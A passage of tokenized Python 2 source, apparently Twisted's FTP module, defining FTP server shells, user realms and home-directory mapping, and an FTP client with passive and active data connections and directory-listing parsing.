stopFactory ( self ) <EOL> class IFTPShell ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def makeDirectory ( path ) : <EOL> """<STR_LIT>""" <EOL> def removeDirectory ( path ) : <EOL> """<STR_LIT>""" <EOL> def removeFile ( path ) : <EOL> """<STR_LIT>""" <EOL> def rename ( fromPath , toPath ) : <EOL> """<STR_LIT>""" <EOL> def access ( path ) : <EOL> """<STR_LIT>""" <EOL> def stat ( path , keys = ( ) ) : <EOL> """<STR_LIT>""" <EOL> def list ( path , keys = ( ) ) : <EOL> """<STR_LIT>""" <EOL> def openForReading ( path ) : <EOL> """<STR_LIT>""" <EOL> def openForWriting ( path ) : <EOL> """<STR_LIT>""" <EOL> class IReadFile ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def send ( consumer ) : <EOL> """<STR_LIT>""" <EOL> class IWriteFile ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def receive ( ) : <EOL> """<STR_LIT>""" <EOL> def close ( ) : <EOL> """<STR_LIT>""" <EOL> def _getgroups ( uid ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> pwent = pwd . getpwuid ( uid ) <EOL> result . append ( pwent . pw_gid ) <EOL> for grent in grp . getgrall ( ) : <EOL> if pwent . pw_name in grent . gr_mem : <EOL> result . append ( grent . gr_gid ) <EOL> return result <EOL> def _testPermissions ( uid , gid , spath , mode = '<STR_LIT:r>' ) : <EOL> """<STR_LIT>""" <EOL> if mode == '<STR_LIT:r>' : <EOL> usr = stat . S_IRUSR <EOL> grp = stat . S_IRGRP <EOL> oth = stat . S_IROTH <EOL> amode = os . R_OK <EOL> elif mode == '<STR_LIT:w>' : <EOL> usr = stat . S_IWUSR <EOL> grp = stat . S_IWGRP <EOL> oth = stat . S_IWOTH <EOL> amode = os . W_OK <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( mode , ) ) <EOL> access = False <EOL> if os . path . exists ( spath ) : <EOL> if uid == <NUM_LIT:0> : <EOL> access = True <EOL> else : <EOL> s = os . stat ( spath ) <EOL> if usr & s . st_mode and uid == s . st_uid : <EOL> access = True <EOL> elif grp & s . st_mode and gid in _getgroups ( uid ) : <EOL> access = True <EOL> elif oth & s . st_mode : <EOL> access = True <EOL> if access : <EOL> if not os . 
access ( spath , amode ) : <EOL> access = False <EOL> log . msg ( "<STR_LIT>" % ( <EOL> uid , os . getuid ( ) ) ) <EOL> return access <EOL> class FTPAnonymousShell ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( IFTPShell ) <EOL> def __init__ ( self , filesystemRoot ) : <EOL> self . filesystemRoot = filesystemRoot <EOL> def _path ( self , path ) : <EOL> return self . filesystemRoot . descendant ( path ) <EOL> def makeDirectory ( self , path ) : <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def removeDirectory ( self , path ) : <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def removeFile ( self , path ) : <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def rename ( self , fromPath , toPath ) : <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def receive ( self , path ) : <EOL> path = self . _path ( path ) <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def openForReading ( self , path ) : <EOL> """<STR_LIT>""" <EOL> p = self . _path ( path ) <EOL> if p . isdir ( ) : <EOL> return defer . fail ( IsADirectoryError ( path ) ) <EOL> try : <EOL> f = p . open ( '<STR_LIT:r>' ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( _FileReader ( f ) ) <EOL> def openForWriting ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return defer . fail ( PermissionDeniedError ( "<STR_LIT>" ) ) <EOL> def access ( self , path ) : <EOL> p = self . _path ( path ) <EOL> if not p . exists ( ) : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> try : <EOL> p . listdir ( ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def stat ( self , path , keys = ( ) ) : <EOL> p = self . _path ( path ) <EOL> if p . 
isdir ( ) : <EOL> try : <EOL> statResult = self . _statNode ( p , keys ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( statResult ) <EOL> else : <EOL> return self . list ( path , keys ) . addCallback ( lambda res : res [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def list ( self , path , keys = ( ) ) : <EOL> """<STR_LIT>""" <EOL> filePath = self . _path ( path ) <EOL> if filePath . isdir ( ) : <EOL> entries = filePath . listdir ( ) <EOL> fileEntries = [ filePath . child ( p ) for p in entries ] <EOL> elif filePath . isfile ( ) : <EOL> entries = [ os . path . join ( * filePath . segmentsFrom ( self . filesystemRoot ) ) ] <EOL> fileEntries = [ filePath ] <EOL> else : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> results = [ ] <EOL> for fileName , filePath in zip ( entries , fileEntries ) : <EOL> ent = [ ] <EOL> results . append ( ( fileName , ent ) ) <EOL> if keys : <EOL> try : <EOL> ent . extend ( self . _statNode ( filePath , keys ) ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , fileName ) <EOL> except : <EOL> return defer . fail ( ) <EOL> return defer . succeed ( results ) <EOL> def _statNode ( self , filePath , keys ) : <EOL> """<STR_LIT>""" <EOL> filePath . restat ( ) <EOL> return [ getattr ( self , '<STR_LIT>' + k ) ( filePath ) for k in keys ] <EOL> def _stat_size ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> return fp . getsize ( ) <EOL> def _stat_permissions ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> return fp . getPermissions ( ) <EOL> def _stat_hardlinks ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return fp . getNumberOfHardLinks ( ) <EOL> except NotImplementedError : <EOL> return <NUM_LIT:0> <EOL> def _stat_modified ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> return fp . 
getModificationTime ( ) <EOL> def _stat_owner ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> userID = fp . getUserID ( ) <EOL> except NotImplementedError : <EOL> return "<STR_LIT:0>" <EOL> else : <EOL> if pwd is not None : <EOL> try : <EOL> return pwd . getpwuid ( userID ) [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> pass <EOL> return str ( userID ) <EOL> def _stat_group ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> groupID = fp . getGroupID ( ) <EOL> except NotImplementedError : <EOL> return "<STR_LIT:0>" <EOL> else : <EOL> if grp is not None : <EOL> try : <EOL> return grp . getgrgid ( groupID ) [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> pass <EOL> return str ( groupID ) <EOL> def _stat_directory ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> return fp . isdir ( ) <EOL> class _FileReader ( object ) : <EOL> implements ( IReadFile ) <EOL> def __init__ ( self , fObj ) : <EOL> self . fObj = fObj <EOL> self . _send = False <EOL> def _close ( self , passthrough ) : <EOL> self . _send = True <EOL> self . fObj . close ( ) <EOL> return passthrough <EOL> def send ( self , consumer ) : <EOL> assert not self . _send , "<STR_LIT>" <EOL> self . _send = True <EOL> d = basic . FileSender ( ) . beginFileTransfer ( self . fObj , consumer ) <EOL> d . addBoth ( self . _close ) <EOL> return d <EOL> class FTPShell ( FTPAnonymousShell ) : <EOL> """<STR_LIT>""" <EOL> def makeDirectory ( self , path ) : <EOL> p = self . _path ( path ) <EOL> try : <EOL> p . makedirs ( ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def removeDirectory ( self , path ) : <EOL> p = self . _path ( path ) <EOL> if p . isfile ( ) : <EOL> return defer . fail ( IsNotADirectoryError ( path ) ) <EOL> try : <EOL> os . rmdir ( p . path ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . 
errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def removeFile ( self , path ) : <EOL> p = self . _path ( path ) <EOL> if p . isdir ( ) : <EOL> return defer . fail ( IsADirectoryError ( path ) ) <EOL> try : <EOL> p . remove ( ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def rename ( self , fromPath , toPath ) : <EOL> fp = self . _path ( fromPath ) <EOL> tp = self . _path ( toPath ) <EOL> try : <EOL> os . rename ( fp . path , tp . path ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , fromPath ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def openForWriting ( self , path ) : <EOL> """<STR_LIT>""" <EOL> p = self . _path ( path ) <EOL> if p . isdir ( ) : <EOL> return defer . fail ( IsADirectoryError ( path ) ) <EOL> try : <EOL> fObj = p . open ( '<STR_LIT:w>' ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> return defer . succeed ( _FileWriter ( fObj ) ) <EOL> class _FileWriter ( object ) : <EOL> implements ( IWriteFile ) <EOL> def __init__ ( self , fObj ) : <EOL> self . fObj = fObj <EOL> self . _receive = False <EOL> def receive ( self ) : <EOL> assert not self . _receive , "<STR_LIT>" <EOL> self . _receive = True <EOL> return defer . succeed ( FileConsumer ( self . fObj ) ) <EOL> def close ( self ) : <EOL> return defer . succeed ( None ) <EOL> class BaseFTPRealm : <EOL> """<STR_LIT>""" <EOL> implements ( portal . IRealm ) <EOL> def __init__ ( self , anonymousRoot ) : <EOL> self . anonymousRoot = filepath . FilePath ( anonymousRoot ) <EOL> def getHomeDirectory ( self , avatarId ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" % ( self . 
__class__ , ) ) <EOL> def requestAvatar ( self , avatarId , mind , * interfaces ) : <EOL> for iface in interfaces : <EOL> if iface is IFTPShell : <EOL> if avatarId is checkers . ANONYMOUS : <EOL> avatar = FTPAnonymousShell ( self . anonymousRoot ) <EOL> else : <EOL> avatar = FTPShell ( self . getHomeDirectory ( avatarId ) ) <EOL> return ( IFTPShell , avatar , <EOL> getattr ( avatar , '<STR_LIT>' , lambda : None ) ) <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" ) <EOL> class FTPRealm ( BaseFTPRealm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , anonymousRoot , userHome = '<STR_LIT>' ) : <EOL> BaseFTPRealm . __init__ ( self , anonymousRoot ) <EOL> self . userHome = filepath . FilePath ( userHome ) <EOL> def getHomeDirectory ( self , avatarId ) : <EOL> """<STR_LIT>""" <EOL> return self . userHome . child ( avatarId ) <EOL> class SystemFTPRealm ( BaseFTPRealm ) : <EOL> """<STR_LIT>""" <EOL> def getHomeDirectory ( self , avatarId ) : <EOL> """<STR_LIT>""" <EOL> path = os . path . expanduser ( '<STR_LIT>' + avatarId ) <EOL> if path . startswith ( '<STR_LIT>' ) : <EOL> raise cred_error . UnauthorizedLogin ( ) <EOL> return filepath . FilePath ( path ) <EOL> class ConnectionLost ( FTPError ) : <EOL> pass <EOL> class CommandFailed ( FTPError ) : <EOL> pass <EOL> class BadResponse ( FTPError ) : <EOL> pass <EOL> class UnexpectedResponse ( FTPError ) : <EOL> pass <EOL> class UnexpectedData ( FTPError ) : <EOL> pass <EOL> class FTPCommand : <EOL> def __init__ ( self , text = None , public = <NUM_LIT:0> ) : <EOL> self . text = text <EOL> self . deferred = defer . Deferred ( ) <EOL> self . ready = <NUM_LIT:1> <EOL> self . public = public <EOL> self . transferDeferred = None <EOL> def fail ( self , failure ) : <EOL> if self . public : <EOL> self . deferred . errback ( failure ) <EOL> class ProtocolWrapper ( protocol . Protocol ) : <EOL> def __init__ ( self , original , deferred ) : <EOL> self . original = original <EOL> self . 
deferred = deferred <EOL> def makeConnection ( self , transport ) : <EOL> self . original . makeConnection ( transport ) <EOL> def dataReceived ( self , data ) : <EOL> self . original . dataReceived ( data ) <EOL> def connectionLost ( self , reason ) : <EOL> self . original . connectionLost ( reason ) <EOL> self . deferred . callback ( None ) <EOL> class IFinishableConsumer ( interfaces . IConsumer ) : <EOL> """<STR_LIT>""" <EOL> def finish ( ) : <EOL> """<STR_LIT>""" <EOL> class SenderProtocol ( protocol . Protocol ) : <EOL> implements ( IFinishableConsumer ) <EOL> def __init__ ( self ) : <EOL> self . connectedDeferred = defer . Deferred ( ) <EOL> self . deferred = defer . Deferred ( ) <EOL> def dataReceived ( self , data ) : <EOL> raise UnexpectedData ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def makeConnection ( self , transport ) : <EOL> protocol . Protocol . makeConnection ( self , transport ) <EOL> self . connectedDeferred . callback ( self ) <EOL> def connectionLost ( self , reason ) : <EOL> if reason . check ( error . ConnectionDone ) : <EOL> self . deferred . callback ( '<STR_LIT>' ) <EOL> else : <EOL> self . deferred . errback ( reason ) <EOL> def write ( self , data ) : <EOL> self . transport . write ( data ) <EOL> def registerProducer ( self , producer , streaming ) : <EOL> """<STR_LIT>""" <EOL> self . transport . registerProducer ( producer , streaming ) <EOL> def unregisterProducer ( self ) : <EOL> """<STR_LIT>""" <EOL> self . transport . unregisterProducer ( ) <EOL> def finish ( self ) : <EOL> self . transport . loseConnection ( ) <EOL> def decodeHostPort ( line ) : <EOL> """<STR_LIT>""" <EOL> abcdef = re . sub ( '<STR_LIT>' , '<STR_LIT>' , line ) <EOL> parsed = [ int ( p . strip ( ) ) for p in abcdef . 
split ( '<STR_LIT:U+002C>' ) ] <EOL> for x in parsed : <EOL> if x < <NUM_LIT:0> or x > <NUM_LIT:255> : <EOL> raise ValueError ( "<STR_LIT>" , line , x ) <EOL> a , b , c , d , e , f = parsed <EOL> host = "<STR_LIT>" % ( a , b , c , d ) <EOL> port = ( int ( e ) << <NUM_LIT:8> ) + int ( f ) <EOL> return host , port <EOL> def encodeHostPort ( host , port ) : <EOL> numbers = host . split ( '<STR_LIT:.>' ) + [ str ( port >> <NUM_LIT:8> ) , str ( port % <NUM_LIT> ) ] <EOL> return '<STR_LIT:U+002C>' . join ( numbers ) <EOL> def _unwrapFirstError ( failure ) : <EOL> failure . trap ( defer . FirstError ) <EOL> return failure . value . subFailure <EOL> class FTPDataPortFactory ( protocol . ServerFactory ) : <EOL> """<STR_LIT>""" <EOL> noisy = <NUM_LIT:0> <EOL> def buildProtocol ( self , addr ) : <EOL> self . protocol . factory = self <EOL> self . port . loseConnection ( ) <EOL> return self . protocol <EOL> class FTPClientBasic ( basic . LineReceiver ) : <EOL> """<STR_LIT>""" <EOL> debug = False <EOL> def __init__ ( self ) : <EOL> self . actionQueue = [ ] <EOL> self . greeting = None <EOL> self . nextDeferred = defer . Deferred ( ) . addCallback ( self . _cb_greeting ) <EOL> self . nextDeferred . addErrback ( self . fail ) <EOL> self . response = [ ] <EOL> self . _failed = <NUM_LIT:0> <EOL> def fail ( self , error ) : <EOL> """<STR_LIT>""" <EOL> self . _fail ( error ) <EOL> def _fail ( self , error ) : <EOL> """<STR_LIT>""" <EOL> if self . _failed : <EOL> return error <EOL> self . _failed = <NUM_LIT:1> <EOL> if self . nextDeferred : <EOL> try : <EOL> self . nextDeferred . errback ( failure . Failure ( ConnectionLost ( '<STR_LIT>' , error ) ) ) <EOL> except defer . AlreadyCalledError : <EOL> pass <EOL> for ftpCommand in self . actionQueue : <EOL> ftpCommand . fail ( failure . Failure ( ConnectionLost ( '<STR_LIT>' , error ) ) ) <EOL> return error <EOL> def _cb_greeting ( self , greeting ) : <EOL> self . 
greeting = greeting <EOL> def sendLine ( self , line ) : <EOL> """<STR_LIT>""" <EOL> if line is None : <EOL> return <EOL> basic . LineReceiver . sendLine ( self , line ) <EOL> def sendNextCommand ( self ) : <EOL> """<STR_LIT>""" <EOL> ftpCommand = self . popCommandQueue ( ) <EOL> if ftpCommand is None : <EOL> self . nextDeferred = None <EOL> return <EOL> if not ftpCommand . ready : <EOL> self . actionQueue . insert ( <NUM_LIT:0> , ftpCommand ) <EOL> reactor . callLater ( <NUM_LIT:1.0> , self . sendNextCommand ) <EOL> self . nextDeferred = None <EOL> return <EOL> if ftpCommand . text == '<STR_LIT>' : <EOL> self . generatePortCommand ( ftpCommand ) <EOL> if self . debug : <EOL> log . msg ( '<STR_LIT>' % ftpCommand . text ) <EOL> self . nextDeferred = ftpCommand . deferred <EOL> self . sendLine ( ftpCommand . text ) <EOL> def queueCommand ( self , ftpCommand ) : <EOL> """<STR_LIT>""" <EOL> self . actionQueue . append ( ftpCommand ) <EOL> if ( len ( self . actionQueue ) == <NUM_LIT:1> and self . transport is not None and <EOL> self . nextDeferred is None ) : <EOL> self . sendNextCommand ( ) <EOL> def queueStringCommand ( self , command , public = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> ftpCommand = FTPCommand ( command , public ) <EOL> self . queueCommand ( ftpCommand ) <EOL> return ftpCommand . deferred <EOL> def popCommandQueue ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . actionQueue : <EOL> return self . actionQueue . pop ( <NUM_LIT:0> ) <EOL> else : <EOL> return None <EOL> def queueLogin ( self , username , password ) : <EOL> """<STR_LIT>""" <EOL> deferreds = [ ] <EOL> userDeferred = self . queueStringCommand ( '<STR_LIT>' + username , public = <NUM_LIT:0> ) <EOL> deferreds . append ( userDeferred ) <EOL> if password is not None : <EOL> passwordCmd = FTPCommand ( '<STR_LIT>' + password , public = <NUM_LIT:0> ) <EOL> self . queueCommand ( passwordCmd ) <EOL> deferreds . append ( passwordCmd . 
deferred ) <EOL> def cancelPasswordIfNotNeeded ( response ) : <EOL> if response [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> self . actionQueue . remove ( passwordCmd ) <EOL> return response <EOL> userDeferred . addCallback ( cancelPasswordIfNotNeeded ) <EOL> for deferred in deferreds : <EOL> deferred . addErrback ( self . fail ) <EOL> deferred . addErrback ( lambda x : None ) <EOL> def lineReceived ( self , line ) : <EOL> """<STR_LIT>""" <EOL> if self . debug : <EOL> log . msg ( '<STR_LIT>' % line ) <EOL> self . response . append ( line ) <EOL> codeIsValid = re . match ( r'<STR_LIT>' , line ) <EOL> if not codeIsValid : <EOL> return <EOL> code = line [ <NUM_LIT:0> : <NUM_LIT:3> ] <EOL> if code [ <NUM_LIT:0> ] == '<STR_LIT:1>' : <EOL> return <EOL> if self . nextDeferred is None : <EOL> self . fail ( UnexpectedResponse ( self . response ) ) <EOL> return <EOL> response = self . response <EOL> self . response = [ ] <EOL> if code [ <NUM_LIT:0> ] in ( '<STR_LIT:2>' , '<STR_LIT:3>' ) : <EOL> self . nextDeferred . callback ( response ) <EOL> elif code [ <NUM_LIT:0> ] in ( '<STR_LIT:4>' , '<STR_LIT:5>' ) : <EOL> self . nextDeferred . errback ( failure . Failure ( CommandFailed ( response ) ) ) <EOL> else : <EOL> log . msg ( '<STR_LIT>' % ( code , ) ) <EOL> self . nextDeferred . errback ( failure . Failure ( BadResponse ( response ) ) ) <EOL> self . sendNextCommand ( ) <EOL> def connectionLost ( self , reason ) : <EOL> self . _fail ( reason ) <EOL> class _PassiveConnectionFactory ( protocol . ClientFactory ) : <EOL> noisy = False <EOL> def __init__ ( self , protoInstance ) : <EOL> self . protoInstance = protoInstance <EOL> def buildProtocol ( self , ignored ) : <EOL> self . protoInstance . factory = self <EOL> return self . protoInstance <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> e = FTPError ( '<STR_LIT>' , reason ) <EOL> self . protoInstance . deferred . 
errback ( e ) <EOL> class FTPClient ( FTPClientBasic ) : <EOL> """<STR_LIT>""" <EOL> connectFactory = reactor . connectTCP <EOL> def __init__ ( self , username = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> passive = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> FTPClientBasic . __init__ ( self ) <EOL> self . queueLogin ( username , password ) <EOL> self . passive = passive <EOL> def fail ( self , error ) : <EOL> """<STR_LIT>""" <EOL> self . transport . loseConnection ( ) <EOL> self . _fail ( error ) <EOL> def receiveFromConnection ( self , commands , protocol ) : <EOL> """<STR_LIT>""" <EOL> protocol = interfaces . IProtocol ( protocol ) <EOL> wrapper = ProtocolWrapper ( protocol , defer . Deferred ( ) ) <EOL> return self . _openDataConnection ( commands , wrapper ) <EOL> def queueLogin ( self , username , password ) : <EOL> """<STR_LIT>""" <EOL> FTPClientBasic . queueLogin ( self , username , password ) <EOL> d = self . queueStringCommand ( '<STR_LIT>' , public = <NUM_LIT:0> ) <EOL> d . addErrback ( self . fail ) <EOL> d . addErrback ( lambda x : None ) <EOL> def sendToConnection ( self , commands ) : <EOL> """<STR_LIT>""" <EOL> s = SenderProtocol ( ) <EOL> r = self . _openDataConnection ( commands , s ) <EOL> return ( s . connectedDeferred , r ) <EOL> def _openDataConnection ( self , commands , protocol ) : <EOL> """<STR_LIT>""" <EOL> cmds = [ FTPCommand ( command , public = <NUM_LIT:1> ) for command in commands ] <EOL> cmdsDeferred = defer . DeferredList ( [ cmd . deferred for cmd in cmds ] , <EOL> fireOnOneErrback = True , consumeErrors = True ) <EOL> cmdsDeferred . addErrback ( _unwrapFirstError ) <EOL> if self . passive : <EOL> _mutable = [ None ] <EOL> def doPassive ( response ) : <EOL> """<STR_LIT>""" <EOL> host , port = decodeHostPort ( response [ - <NUM_LIT:1> ] [ <NUM_LIT:4> : ] ) <EOL> f = _PassiveConnectionFactory ( protocol ) <EOL> _mutable [ <NUM_LIT:0> ] = self . 
connectFactory ( host , port , f ) <EOL> pasvCmd = FTPCommand ( '<STR_LIT>' ) <EOL> self . queueCommand ( pasvCmd ) <EOL> pasvCmd . deferred . addCallback ( doPassive ) . addErrback ( self . fail ) <EOL> results = [ cmdsDeferred , pasvCmd . deferred , protocol . deferred ] <EOL> d = defer . DeferredList ( results , fireOnOneErrback = True , consumeErrors = True ) <EOL> d . addErrback ( _unwrapFirstError ) <EOL> def close ( x , m = _mutable ) : <EOL> m [ <NUM_LIT:0> ] and m [ <NUM_LIT:0> ] . disconnect ( ) <EOL> return x <EOL> d . addBoth ( close ) <EOL> else : <EOL> portCmd = FTPCommand ( '<STR_LIT>' ) <EOL> portCmd . transferDeferred = protocol . deferred <EOL> portCmd . protocol = protocol <EOL> portCmd . deferred . addErrback ( portCmd . transferDeferred . errback ) <EOL> self . queueCommand ( portCmd ) <EOL> portCmd . loseConnection = lambda result : result <EOL> portCmd . fail = lambda error : error <EOL> cmdsDeferred . addErrback ( lambda e , pc = portCmd : pc . fail ( e ) or e ) <EOL> results = [ cmdsDeferred , portCmd . deferred , portCmd . transferDeferred ] <EOL> d = defer . DeferredList ( results , fireOnOneErrback = True , consumeErrors = True ) <EOL> d . addErrback ( _unwrapFirstError ) <EOL> for cmd in cmds : <EOL> self . queueCommand ( cmd ) <EOL> return d <EOL> def generatePortCommand ( self , portCmd ) : <EOL> """<STR_LIT>""" <EOL> factory = FTPDataPortFactory ( ) <EOL> factory . protocol = portCmd . protocol <EOL> listener = reactor . listenTCP ( <NUM_LIT:0> , factory ) <EOL> factory . port = listener <EOL> def listenerFail ( error , listener = listener ) : <EOL> if listener . connected : <EOL> listener . loseConnection ( ) <EOL> return error <EOL> portCmd . fail = listenerFail <EOL> host = self . transport . getHost ( ) . host <EOL> port = listener . getHost ( ) . port <EOL> portCmd . text = '<STR_LIT>' + encodeHostPort ( host , port ) <EOL> def escapePath ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return path . 
replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> def retrieveFile ( self , path , protocol , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> cmds = [ '<STR_LIT>' + self . escapePath ( path ) ] <EOL> if offset : <EOL> cmds . insert ( <NUM_LIT:0> , ( '<STR_LIT>' + str ( offset ) ) ) <EOL> return self . receiveFromConnection ( cmds , protocol ) <EOL> retr = retrieveFile <EOL> def storeFile ( self , path , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> cmds = [ '<STR_LIT>' + self . escapePath ( path ) ] <EOL> if offset : <EOL> cmds . insert ( <NUM_LIT:0> , ( '<STR_LIT>' + str ( offset ) ) ) <EOL> return self . sendToConnection ( cmds ) <EOL> stor = storeFile <EOL> def rename ( self , pathFrom , pathTo ) : <EOL> """<STR_LIT>""" <EOL> renameFrom = self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( pathFrom ) ) <EOL> renameTo = self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( pathTo ) ) <EOL> fromResponse = [ ] <EOL> result = defer . Deferred ( ) <EOL> result . addCallback ( lambda toResponse : ( fromResponse , toResponse ) ) <EOL> def ebFrom ( failure ) : <EOL> self . popCommandQueue ( ) <EOL> result . errback ( failure ) <EOL> renameFrom . addCallbacks ( fromResponse . extend , ebFrom ) <EOL> renameTo . chainDeferred ( result ) <EOL> return result <EOL> def list ( self , path , protocol ) : <EOL> """<STR_LIT>""" <EOL> if path is None : <EOL> path = '<STR_LIT>' <EOL> return self . receiveFromConnection ( [ '<STR_LIT>' + self . escapePath ( path ) ] , protocol ) <EOL> def nlst ( self , path , protocol ) : <EOL> """<STR_LIT>""" <EOL> if path is None : <EOL> path = '<STR_LIT>' <EOL> return self . receiveFromConnection ( [ '<STR_LIT>' + self . escapePath ( path ) ] , protocol ) <EOL> def cwd ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( path ) ) <EOL> def makeDirectory ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' + self . 
escapePath ( path ) ) <EOL> def removeFile ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( path ) ) <EOL> def removeDirectory ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( path ) ) <EOL> def cdup ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' ) <EOL> def pwd ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' ) <EOL> def getDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> def cbParse ( result ) : <EOL> try : <EOL> if int ( result [ <NUM_LIT:0> ] . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] ) != <NUM_LIT> : <EOL> raise ValueError <EOL> except ( IndexError , ValueError ) : <EOL> return failure . Failure ( CommandFailed ( result ) ) <EOL> path = parsePWDResponse ( result [ <NUM_LIT:0> ] ) <EOL> if path is None : <EOL> return failure . Failure ( CommandFailed ( result ) ) <EOL> return path <EOL> return self . pwd ( ) . addCallback ( cbParse ) <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' ) <EOL> class FTPFileListProtocol ( basic . LineReceiver ) : <EOL> """<STR_LIT>""" <EOL> fileLinePattern = re . compile ( <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> ) <EOL> delimiter = '<STR_LIT:\n>' <EOL> def __init__ ( self ) : <EOL> self . files = [ ] <EOL> def lineReceived ( self , line ) : <EOL> d = self . parseDirectoryLine ( line ) <EOL> if d is None : <EOL> self . unknownLine ( line ) <EOL> else : <EOL> self . addFile ( d ) <EOL> def parseDirectoryLine ( self , line ) : <EOL> """<STR_LIT>""" <EOL> match = self . fileLinePattern . match ( line ) <EOL> if match is None : <EOL> return None <EOL> else : <EOL> d = match . groupdict ( ) <EOL> d [ '<STR_LIT:filename>' ] = d [ '<STR_LIT:filename>' ] . 
replace ( r'<STR_LIT>' , '<STR_LIT:U+0020>' ) <EOL> d [ '<STR_LIT>' ] = int ( d [ '<STR_LIT>' ] ) <EOL> d [ '<STR_LIT:size>' ] = int ( d [ '<STR_LIT:size>' ] ) <EOL> if d [ '<STR_LIT>' ] : <EOL> d [ '<STR_LIT>' ] = d [ '<STR_LIT>' ] . replace ( r'<STR_LIT>' , '<STR_LIT:U+0020>' ) <EOL> return d <EOL> def addFile ( self , info ) : <EOL> """<STR_LIT>""" <EOL> self . files . append ( info ) <EOL> def unknownLine ( self , line ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def parsePWDResponse ( response ) : <EOL> """<STR_LIT>""" <EOL> match = re . search ( '<STR_LIT>' , response ) <EOL> if match : <EOL> return match . groups ( ) [ <NUM_LIT:0> ] <EOL> else : <EOL> return None </s>
